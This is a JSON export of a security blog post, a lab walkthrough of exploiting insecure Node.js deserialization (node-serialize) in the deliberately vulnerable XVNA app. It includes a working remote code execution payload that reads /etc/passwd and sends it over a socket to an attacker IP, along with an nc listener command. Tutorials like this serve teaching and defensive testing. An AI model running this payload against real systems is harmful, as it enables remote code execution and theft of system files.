{"id":251,"date":"2018-03-17T02:49:51","date_gmt":"2018-03-17T02:49:51","guid":{"rendered":"http:\/\/malwrforensics.com\/en\/?p=251"},"modified":"2018-03-18T17:05:25","modified_gmt":"2018-03-18T17:05:25","slug":"extreme-vulnerable-node-application-xvna-insecure-nodejs-deserialization","status":"publish","type":"post","link":"https:\/\/malwrforensics.com\/en\/2018\/03\/17\/extreme-vulnerable-node-application-xvna-insecure-nodejs-deserialization\/","title":{"rendered":"eXtreme Vulnerable Node Application (XVNA) – Insecure nodejs deserialization"},"content":{"rendered":"

In this post we’ll have a look at the nodejs deserialization attack\/exploit in XVNA (eXtreme Vulnerable Node Application). Insecure deserialization<\/a> is part of the OWASP Top 10<\/a> list that was published in 2017.<\/p>\n

We’ll use the setup detailed here<\/a> (XVNA runs on port 80). As a web proxy, Burp<\/a> or ZAP<\/a> are highly recommended, but you can use anything else that allows you to view\/edit\/send HTTP requests.<\/p>\n

From the main dashboard in XVNA, we need to go to the A8:2017-Insecure Deserialization<\/strong> section.<\/p>\n

\"\"<\/p>\n

Here, once you select the item (Apple, Banana, Egg, Beans) and click Check, a JSON request is sent to the web server with your choice.<\/p>\n

\"\"<\/p>\n

The request is handled inside index.js. A new object (obj<\/strong>) will be declared and the userid parameter value from the POST request will be added to the name<\/strong> key.<\/p>\n

The object will be first serialized and then deserialized and the say<\/strong> function will be called.<\/p>\n

 var<\/span> id = req.body.userid.toString()\r\n console.log(id)\r\n var<\/span> obj<\/strong> = {\r\n   name: id\r\n   , say: function<\/span> () {\r\n     return<\/span> 'Searched Item<\/span> ' + this<\/span>.name;\r\n   }\r\n };\r\n var<\/span> objS = serialize.serialize(obj);\r\n typeof<\/span> objS === 'string<\/span>';\r\n serialize.unserialize<\/strong>(objS).say();<\/pre>\n
The main issue is tied to the unserialize<\/strong> function (for more info check out opsecx’s article<\/a>), because the input (the userid value) isn’t sanitized. When a serialized Javascript\u00a0Immediately Invoked Function Expression<\/a> (IIFE) is provided as a value to userid, it will be executed during deserialization.<\/p>\n
Now we have to decide what we want as a payload and what’s a good exfil method. Let’s say we want to get the contents of \/etc \/passwd. One way to achieve this is to convince the app to send it to us directly on a specific port.<\/p>\n
For that we’ll run nc -l -v 1234 -vv<\/strong> on the client\/attacker machine. This will open the port 1234\/tcp and wait for a connection.<\/p>\n
The function that we’ll send as a payload will create a socket, connect to our port and send the output of the cat \/etc \/passwd<\/strong> command.<\/p>\n
var f<\/span> =<\/span> function<\/span>()\r\n{\r\n\u00a0 require('child_process<\/span>').exec('cat<\/span> \/etc \/passwd<\/span>', \r\n\u00a0 \u00a0 function<\/span>(error<\/span>, stdout<\/span>, stderr<\/span>){\r\n\u00a0 \u00a0 \u00a0 var<\/span> s<\/span> = require('net<\/span>').Socket();\r\n\u00a0 \u00a0 \u00a0 s<\/span>.connect(1234, '192.168.56.1<\/span>');\r\n\u00a0 \u00a0 \u00a0 s<\/span>.write(stdout); \r\n\u00a0 \u00a0 });\r\n}<\/pre>\n
To serialize the function, we can add the following code, save everything to a js file and run it with nodejs.<\/p>\n
var<\/span> serialize<\/span> = require('node-serialize<\/span>');\r\nconsole.log(serialize<\/span>.serialize(f));<\/pre>\n
Remember that we’re using IIFE here. Basically we have defined a function that we want to call it immediately, so we need to add ( )<\/strong> at the end.<\/p>\n
Now we have everything we need to exploit the app. Let’s send the request again and intercept it using your proxy. We need to edit the userid’s value and replace it with something like this:<\/p>\n
{“userid”: “_$$ND_FUNC$$_function (){require(‘child_process’).exec(‘cat \/etc \/passwd’, function(error, stdout, stderr){var s=require(‘net’).Socket();s.connect(1234,’192.168.56.1′);s.write(stdout);});}()”}<\/span><\/p>\n
\"\"<\/p>\n
If successful, you should see something like this in your nc window:<\/p>\n
\"\"<\/p>\n
Enjoy!<\/p>\n","protected":false},"excerpt":{"rendered":"
In this post we’ll have a look at the nodejs deserialization attack\/exploit in XVNA (eXtreme Vulnerable Node Application). Insecure deserialization is part of the OWASP Top 10 list that was published in 2017. We’ll use the setup detailed here (XVNA runs on port 80). As a web proxy, Burp or ZAP are highly recommended, but […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[51,5,73,71,68,72,75,64,76,74,66],"class_list":["post-251","post","type-post","status-publish","format-standard","hentry","category-security","tag-deserialization","tag-exploit","tag-insecure-deserialization","tag-json","tag-nodejs","tag-owasp","tag-payload","tag-serialization","tag-serialize","tag-unserialize","tag-xvna"],"blocksy_meta":{"styles_descriptor":{"styles":{"desktop":"","tablet":"","mobile":""},"google_fonts":[]}},"featured_image_urls_v2":{"full":"","thumbnail":"","medium":"","medium_large":"","large":"","1536x1536":"","2048x2048":""},"post_excerpt_stackable_v2":"
In this post we’ll have a look at the nodejs deserialization attack\/exploit in XVNA (eXtreme Vulnerable Node Application). Insecure deserialization is part of the OWASP Top 10 list that was published in 2017. We’ll use the setup detailed here (XVNA runs on port 80). As a web proxy, Burp or ZAP are highly recommended, but you can use anything else that allows you to view\/edit\/send HTTP requests. From the main dashboard in XVNA, we need to go to the A8:2017-Insecure Deserialization section. Here, once you select the item (Apple, Banana, Egg, Beans) and click Check, a JSON request is sent…<\/p>\n","category_list_v2":"Security<\/a>","author_info_v2":{"name":"malwrforensics","url":"https:\/\/malwrforensics.com\/en\/author\/u_malwrforensics\/"},"comments_num_v2":"0 comments","_links":{"self":[{"href":"https:\/\/malwrforensics.com\/en\/wp-json\/wp\/v2\/posts\/251","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/malwrforensics.com\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/malwrforensics.com\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/malwrforensics.com\/en\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/malwrforensics.com\/en\/wp-json\/wp\/v2\/comments?post=251"}],"version-history":[{"count":4,"href":"https:\/\/malwrforensics.com\/en\/wp-json\/wp\/v2\/posts\/251\/revisions"}],"predecessor-version":[{"id":259,"href":"https:\/\/malwrforensics.com\/en\/wp-json\/wp\/v2\/posts\/251\/revisions\/259"}],"wp:attachment":[{"href":"https:\/\/malwrforensics.com\/en\/wp-json\/wp\/v2\/media?parent=251"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/malwrforensics.com\/en\/wp-json\/wp\/v2\/categories?post=251"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/malwrforensics.com\/en\/wp-json\/wp\/v2\/tags?post=251"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}